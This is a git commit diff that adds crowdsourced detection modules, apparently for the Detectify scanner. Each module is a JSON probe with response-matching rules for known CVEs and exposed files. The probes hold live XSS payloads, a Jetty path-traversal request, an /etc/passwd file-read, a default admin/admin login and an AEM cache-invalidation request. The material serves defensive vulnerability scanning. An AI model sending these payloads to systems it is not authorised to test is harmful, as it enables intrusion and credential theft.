Add modules submitted through Crowdsource

detectify · Jul 20, 2021 · 344e1f7 · 344e1f7
1 parent 667fe23
commit 344e1f7
Show file tree

Hide file tree

Showing 35 changed files with 978 additions and 0 deletions.
diff --git a/modules/crowdsourced/CVE-2017-9140.json b/modules/crowdsourced/CVE-2017-9140.json
@@ -0,0 +1,24 @@
+{
+	"request": {
+		"paths": [
+			"/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000\"onload=\"prompt(1)"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200
+			},
+			{
+				"type": "static",
+				"pattern": "var ParametersPage = new ParametersPage"
+			},
+			{
+				"type": "static",
+				"pattern": "#000000\"onload=\"prompt(1);"
+			}
+		]
+	}
+}
diff --git a/modules/crowdsourced/CVE-2019-3402.json b/modules/crowdsourced/CVE-2019-3402.json
@@ -0,0 +1,26 @@
+{
+	"request": {
+		"paths": [
+			"/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)text/html"
+			},
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "<script>alert(1)</script>"
+			}
+		]
+	}
+}
diff --git a/modules/crowdsourced/CVE-2021-28169.json b/modules/crowdsourced/CVE-2021-28169.json
@@ -0,0 +1,21 @@
+{
+	"request": {
+		"paths": [
+			"/concat?/%2557EB-INF/web.xml"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)(text/xml|application/xml)"
+			},
+			{
+				"type": "static",
+				"pattern": "<web-app xmlns=\"http://java.sun.com/xml/ns/j2ee\""
+			}
+		]
+	}
+}
diff --git a/modules/crowdsourced/CVE-2021-32820.json b/modules/crowdsourced/CVE-2021-32820.json
@@ -0,0 +1,24 @@
+{
+	"request": {
+		"paths": [
+			"?layout=/etc/passwd"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "regex",
+				"pattern": "\\s*root:[x*]"
+			},
+			{
+				"type": "regex",
+				"pattern": "\\s*daemon:[x*]"
+			},
+			{
+				"type": "regex",
+				"pattern": "\\s*operator:[x*]:"
+			}
+		]
+	}
+}
diff --git a/modules/crowdsourced/activeadmin-panel-disclosure.json b/modules/crowdsourced/activeadmin-panel-disclosure.json
@@ -0,0 +1,23 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"/admin"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)text/html",
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "<p>Powered by <a href=\"http://www.activeadmin.info\">Active Admin"
+			}
+		]
+	}
+}
diff --git a/modules/crowdsourced/aem-invalidate-cache.json b/modules/crowdsourced/aem-invalidate-cache.json
@@ -0,0 +1,24 @@
+{
+	"request": {
+		"paths": [
+			"/dispatcher/invalidate.cache"
+		],
+		"headers": [
+			"CQ-Handle: /content",
+			"CQ-Path: /content"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200
+			},
+			{
+				"type": "regex",
+				"pattern": "^<H1>OK</H1>$"
+			}
+		]
+	}
+}
diff --git a/modules/crowdsourced/apache-airflow-debug-trace.json b/modules/crowdsourced/apache-airflow-debug-trace.json
@@ -0,0 +1,24 @@
+{
+	"request": {
+		"paths": [
+			"/admin/airflow/#"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "status",
+				"code": 500
+			},
+			{
+				"type": "static",
+				"pattern": "<h1> Ooops. </h1>"
+			},
+			{
+				"type": "static",
+				"pattern": "Traceback (most recent call last)"
+			}
+		]
+	}
+}
diff --git a/modules/crowdsourced/apache-superset-default-credentials.json b/modules/crowdsourced/apache-superset-default-credentials.json
@@ -0,0 +1,23 @@
+{
+	"request": {
+		"method": "POST",
+		"path": "/#/",
+		"body": "username=admin&password=admin",
+		"headers": [
+			"Content-Type: application/x-www-form-urlencoded; charset=UTF-8"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "static",
+				"pattern": "<title>Redirecting...</title>"
+			},
+			{
+				"type": "static",
+				"pattern": "<a href=\"/\">/</a>"
+			}
+		]
+	}
+}
diff --git a/modules/crowdsourced/appsec-yml-disclosure.json b/modules/crowdsourced/appsec-yml-disclosure.json
@@ -0,0 +1,53 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"/appspec.yml",
+			"/appspec.yaml"
+		]
+	},
+	"response": {
+		"matchesRequired": 5,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)application/yaml",
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "\"version\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"os\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"files\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"permissions\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"hooks\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"BeforeInstall\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"ApplicationStart\""
+			}
+		]
+	}
+}
diff --git a/modules/crowdsourced/clockwork-dashboard-exposure.json b/modules/crowdsourced/clockwork-dashboard-exposure.json
@@ -0,0 +1,38 @@
+{
+	"request": {
+		"paths": [
+			"/__clockwork/latest"
+		]
+	},
+	"response": {
+		"matchesRequired": 6,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)application/json",
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "\"id\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"version\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"method\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"url\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"time\""
+			}
+		]
+	}
+}
diff --git a/modules/crowdsourced/dockerfile-hidden-disclosure.json b/modules/crowdsourced/dockerfile-hidden-disclosure.json
@@ -0,0 +1,23 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"/.dockerfile",
+			"/.Dockerfile"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "regex",
+				"pattern": "^(?:FROM(?:CACHE)?|RUN|ADD|WORKDIR|ENV|EXPOSE|\\#)\\s+[ -~]+"
+			}
+		]
+	}
+}
diff --git a/modules/crowdsourced/esmtprc-dotfile-disclosure.json b/modules/crowdsourced/esmtprc-dotfile-disclosure.json
@@ -0,0 +1,27 @@
+{
+	"name": "esmtprc dotfile",
+	"request": {
+		"path": "/.esmtprc"
+	},
+	"response": {
+		"matchesRequired": 4,
+		"matches": [
+			{
+				"type": "static",
+				"pattern": "hostname"
+			},
+			{
+				"type": "static",
+				"pattern": "username"
+			},
+			{
+				"type": "static",
+				"pattern": "password"
+			},
+			{
+				"type": "status",
+				"code": 200
+			}
+		]
+	}
+}
diff --git a/modules/crowdsourced/filezilla-disclosure.json b/modules/crowdsourced/filezilla-disclosure.json
@@ -0,0 +1,25 @@
+{
+	"request": {
+		"paths": [
+			"/FileZilla.xml"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)(text/xml|application/xml)"
+			},
+			{
+				"type": "static",
+				"pattern": "<RecentServers>"
+			},
+			{
+				"type": "static",
+				"pattern": "<FileZilla"
+			}
+		]
+	}
+}